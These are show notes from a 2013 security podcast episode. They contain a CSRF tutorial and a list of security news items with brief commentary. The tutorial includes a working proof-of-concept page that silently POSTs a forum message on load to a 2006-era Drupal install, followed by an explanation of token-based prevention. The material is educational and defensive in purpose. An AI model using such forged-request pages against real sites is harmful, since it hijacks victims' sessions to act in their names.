From Security Weekly Wiki

Episode Media

Episode 315


Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 315 for Thursday January 10th, 2013

Interview: Kati Rodzon and Mike Murray

Kati Rodzon is the manager of Security Behavior Design for MAD Security. Her last 9 years have been spent studying psychology and ways to modify human behavior. From learning about the power of social pressure on groups, to how subtle changes in reinforcement can drastically change individual behavior, Kati has spent the better part of a decade learning how humans work and now applies that to security awareness.

Mike Murray has spent more than a decade helping companies to protect their information by understanding their vulnerability posture from the perspective of an attacker. Mike co-founded MAD Security, where he leads engagements to help corporate and government customers understand and protect their security organization.

Tech Segment - Cross-Site Request Forgery (CSRF or XSRF)


  • We are in the process of archiving and cataloging our technical segments, please visit the PaulDotCom Technical Library, where we have indexed all of the interviews we have conducted. We are also working on updating all of the articles, so check the newsletter, or if you want to help in exchange for some free guidance and security training, please email me.

CSRF Primer

Yeah, CSRF has been discussed on PaulDotCom a few times before (check out the new and growing technical library) and John has done videos on it. But it's back. We're not showing you anything new or revolutionary, as this was Patrick the Intern's first project, to get acquainted with the attack, how it works and set up a working exploit. For this, we're using a very old (6+ years) version of Drupal, version 4.7.0 to be specific. This vulnerability has long been fixed and if you use Drupal's own forms API, you should not have to worry about CSRF in your Drupal sites.

If you want history and background on CSRF like the "confused deputy" story and links, check out Paul's tech segment on it from Episode 82. However, in a nutshell, what this attack does is let us use an authenticated user's session to perform some action on a site. In this case, a message board. Our message board is set up with permissions so that only users with valid credentials may post to the board. Anyone in the world can read the board, but you need a username and password to post. With CSRF, if we're able to merely get an authenticated user to open a web page, we are able to post what we want to the forum.

How it works

Because we have access to the form, we can view the source and get the necessary information, which is the form's action and the form's variables that need to be sent with the request. For my forum, this is what it looks like, with some unimportant parts removed, like visual styling.

The Code

 <form action="/drupal-4.7.0/?q=node/add/forum/2" method="post">
   <!-- identifies which Drupal form handler receives the submission -->
   <input type="hidden" name="edit[form_id]" id="edit-form_id" value="forum_node_form" />

   <!-- forum/taxonomy term the post lands in -->
   <select name="edit[taxonomy][1]">
     <option value="1">Hacking</option>
     <option value="2">-CSRF</option>
     <option value="3">-XSS</option>
     <option value="4">-SQLi</option>
   </select>

   <input type="text" name="edit[title]" id="edit-title" size="60" />

   <textarea cols="60" rows="20" name="edit[body]"></textarea>

   Publishing options:
   <input type="checkbox" name="edit[status]" value="1" /> Published
   <input type="checkbox" name="edit[moderate]" value="1" /> In moderation queue
   <input type="checkbox" name="edit[promote]" value="1" /> Promoted to front page ...

   <input type="submit" name="op" value="Submit" class="form-submit" />
 </form>


We see that we need to create a web page that will send a request to /drupal-4.7.0/?q=node/add/forum/2 to add a post to the forum with a taxonomy value of 2. Additionally, we need to send the Subject and Body of the post we want to have published. One part that is easily overlooked, and we sometimes see this on various sites: the attacker leaves the message in the moderation queue by not sending the correct publishing option. We'll want to include the "Published" editing status as well, to make sure our post is immediately visible. Lastly, we need to send the "op" of Submit, so the server will think the user submitted this request.

Now, we need to get an authenticated user to send the request via an HTTP POST. One thing we can do is build a form that carries all of these values in hidden input fields (html <input type="hidden"> tags) and then ask the user to click the button for some reason. No intelligent user is going to click the button on a form that some anonymous person sends them. So we need to step this up a bit.

The Exploit

It's not as hard to get someone to simply load a page as it is to get them to click a button on a page. So instead, we're going to add some JavaScript, using jQuery, and send off a POST request when the page loads. Here's the code for that:

 <head>
   <script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
   <script>
     // Runs as soon as the page loads; the browser attaches the victim's
     // Drupal session cookie to the request. The relative URL resolves
     // against the host serving this page, so in this demo the page is
     // hosted alongside the Drupal install.
     function hackMe() {
       $.post("/drupal-4.7.0/?q=node/add/forum/2", {
         'edit[title]': "Cheap Viagra! Free Porn!",
         'edit[taxonomy][1]': "2",
         'edit[body]': "Proof of concept of CSRF! PaulDotCom Rules! Hack Naked!",
         'edit[form_id]': "forum_node_form",
         'edit[status]': "1",
         'op': "Submit"
       });
     }
   </script>
 </head>
 <body onload="hackMe()">
 </body>

Now, we just need to get an authenticated user to load the page we've created and there we have it, the user has posted to the forum for us. [Screenshot: Csrf-screenshot.jpg]


This gets prevented by the use of random and unguessable session tokens. When the user first authenticates, a token is created and placed in that user's session. Every time the user accesses a page with a form, that token is added to the form as a hidden field, and on submission the server compares the token in the request with the one stored in the session. Because the token is only ever rendered into pages served to that user, we can't see it when we look at the form from our own browser, we can't include it in our request, and when the user loads our page the server rejects the submission.

Here is the source from a Drupal 7 blog where the token is now included:

<form action="/drupal-7/forum">
    <input type="hidden" name="form_token" value="Ptu73ZDOgo6Grf2dKmR0FyAycSo90JV9FFVfZNhENHM" />
    <input type="submit" id="edit-submit" name="op" value="Search" class="form-submit" />
    <input type="hidden" name="form_build_id" value="form-fQgMNLtO3mPU-mvfi1GZSYM9GANYdmrMowcO0JxByT0" />
    <input type="hidden" name="form_id" value="search_block_form" />
</form>

For more information on the prevention, check out the frameworks and explanations offered by OWASP.


Additionally, John Wilander has talked about Stateless CSRF, which is interesting and I wanted to mention it, but I'm still working through the mechanics of it all. Basically the way I understand it, it's an alternative to a CAPTCHA. Possibly, we'll go over this in a future segment.


Paul's Stories

  1. Fun with AIX Shellcode and Metasploit
  2. Ipad Extra Screen - Fun little hack, always nice to have a spare monitor. Not so easy to bring with you on a pen test or to a conference. Pen testing is the best use case for this, as you like to have stuff running while keeping an eye on it. But you also want to be doing something else while stuff is running (e.g. password cracking while working on a SQL injection exploit). So, you can use your iPad as a second screen, pretty neat!
  3. Carving Station – RAR Files | M-unition - Carving files is useful. I plan to read through this as reversing firmware requires special carving, hoping to pick up a few tricks.
  4. What Else runs Telnets? Or - I wish more people would take the advice from Rob, which boils down to: Never trust the vendor to correctly install anything. Scan your own perimeter. Never trust documentation. Never put stuff outside your firewall.
  5. $17 - I want open-source on my rifle! So cool: TrackingPoint makes "Precision Guided Firearms, or "PGFs," which are a series of three heavily customized hunting rifles, ranging from a .300 Winchester Magnum with a 22-inch barrel up to a .338 Lapua Magnum with 27-inch barrel, all fitted with advanced computerized scopes that look like something directly out of The Terminator. I'll take a .308 please :)
  6. Does Your Company Actually Need a Security Department? - And here is the answer: If you don't listen to your security department and never do anything they tell you, then you do not need a security department.
  7. WordPress Pingback Portscanner – Metasploit Module - Nice way to scan a network!
  8. 2012: Over and Done With. - Some great advice: Get out more. Get some friends and hobbies outside infosec. I have said this a million times, but it bears repeating. If, at the end of your life, you can only look back and think about all the bullshit “Internet friendships” you’ve had (or not had), then you’ve failed. A life is supposed to be interesting, full of crazy experiences, travel, experiments (both failed and successful, doesn’t matter), and so on. and also: And, perhaps most of all, don’t get all caught up in the politics or the silly rantiness of those who have nothing better to do than sit in front of their %&* computers and bitch. You don’t have to be one of those people. I’m going to get away from that crap as much as possible in 2013 and beyond. Hopefully you will too. Yea, what he said.
  9. Airing Out Security's Dirty Laundry - Last week a former security chief with the South Carolina Department of Revenue got to live out many a frustrated CISO's fantasy. He got to say, "I told you so." Yea, in a big way too. He was the CISO, and he quit because people wouldn't listen. Then, a year later, they got hacked. Bad. I would have worn a shirt that said "I TOLD YOU SO" to the next meeting with them :)
  10. The merger of cellular and Wi-Fi: The wireless network's future - What does this mean for security? What happens when the two technologies merge? Will it be an open spectrum? Will Wifi go away? Will it be more secure? Or will there be an entirely new evolution in wireless hacking? Kind of hoping for a new evolution.
  11. Your friendly Huawei at CES: Complete with uniformed security - Those Chinese, they are so friendly, with their guards and all. Honestly, I don't think Huawei is any better or worse than most consumer embedded device manufacturers when it comes to security. They just happened to be in China and get a bad rap.
  12. 5 tough security questions (and tips on answering them) - Great interview questions? 1) How do you collaborate? 2) Why do you want this job? 3) What questions do you have for me? 4) What are ways you've prioritized and shepherded information security projects through your previous organization? 5) How will you earn and keep your seat at the table with other senior executives?
  13. Kill that Java plugin now! New 0-day exploit running wild online - I love Java 0Day, it always makes the news. Hurray for Java 0day! Let's not get crazy and actually address the client-side security issue or anything; until we do, Java 0days will be a big deal for most.

Larry's Stories

  1. Nokia Shady SSL - [Larry] - Someone theorized that certain Nokia phones were MiTM-ing SSL connections, as regular traffic seemed to be proxied. What they found was that for some sites, the certificates did not match what was expected from a non-Nokia phone. Turns out Nokia was in the middle via proxy - which they claim was to monitor performance. So, how'd they do it? The browser on the Nokia phone pre-trusts the certificates from the factory so no errors appear.
  2. MIB hackers? - [Larry] - Hacker hides source code to the "remote control virus" in an SD card hidden on a stray cat's collar. How many stray cats wear collars?
  3. NTLM broken - [Larry] - well, no duh, but I think that this is the last nail in the coffin for putting together items that have been around for a long time. This one infers using the NTLM challenge response to generate the hashes based on the weaknesses in MSCHAPv2 in order to recover and bruteforce hashes with cloudcracker. MATH HARD!
  4. Creating better passwords - [Larry] - "Your password needs to contain a capital letter, a number, an emoji, 8 elements from the Periodic Table and a plot containing a protagonist with some character development and a twisted ending."
  5. Oh McAfee, yousoooo craaaazy - [Larry] - So, JM allegedly "bribes" Belize officials with free laptops infested with remote monitoring malware (that he allegedly wrote according to some articles - SEE I KNEW IT! AV VENDORS WRITE THE VIRUSES. Self fulfilling prophecy and all that…) which he used to spy on said officials after his problem with the law. He also claims to have tried to infiltrate the phone company to monitor their phone calls. Ummm. One, you may have heard of this guy called Kevin Mitnick who went to prison for a long time for doing similar things. Two, admitting to a crime (regardless of country) while you are already up shit's creek is probably counterproductive to your plans.

Patrick's Stories

  1. New Java 0day - Recommendation? Unplug Java browser plugin, Brian Krebs explains how
  2. Windows Technical Support Calls Ars Again - If you missed it, "Windows" previously called and the entire process was documented. Well, they tried again. With the same guy.
  3. Mastercard Defaced - Old version of WordPress, and left the readme.html file available.
  4. Forbes.com asks for your contact list, but then actually requires it, simply to leave a comment on articles. But then they send the data off to gigya.com, a social media infrastructure business. What might they need my email contact list for?

Jack's Epic Beard Speaks!

  1. Career Advice from Moxie Marlinspike. Good stuff, and as with most of Moxie's insights, he has some unique perspectives.
  2. So you dumped Adobe Reader for security and moved to Foxit. Well, don't feel safe- another critical vulnerability found in Foxit
  3. Living like a rockstar including the world travel, and prison. Zeus botmaster arrested in Thailand

Allison's Stuff

  1. Stylometric Analysis to Track Anonymous Users - This is a fascinating read. Maybe if we are lucky they will release the tool they used for this.
  2. Putin urges FSB to pay attention to counterintelligence, resistance to cyber crime - I wonder if this signals a change in Russia's attitude towards hacking. Time will tell.
  3. Dutch government aims to shape ethical hackers' disclosure practices - This is an interesting step forward by the Dutch government. One of the difficulties with responsible disclosure is if the flaw is in a live service, companies might try to sue. I'm no lawyer, but is this the first instance of government protection for ethical hackers?
  4. The Japanese cat that holds the clues to an internet prankster - Japanese hacker uses a remote control virus to make bomb threats, authorities arrest the virus victims and extract confessions from them - only to be embarrassed because the hacks continued while the victims remained in custody. Now this cat has been found, wearing an SD card on its collar. The SD card contains information which only the virus writer should know.